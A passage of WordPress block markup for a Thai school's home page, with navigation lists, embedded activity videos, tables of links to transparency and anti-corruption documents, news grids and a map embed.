/wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"22px\"}} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 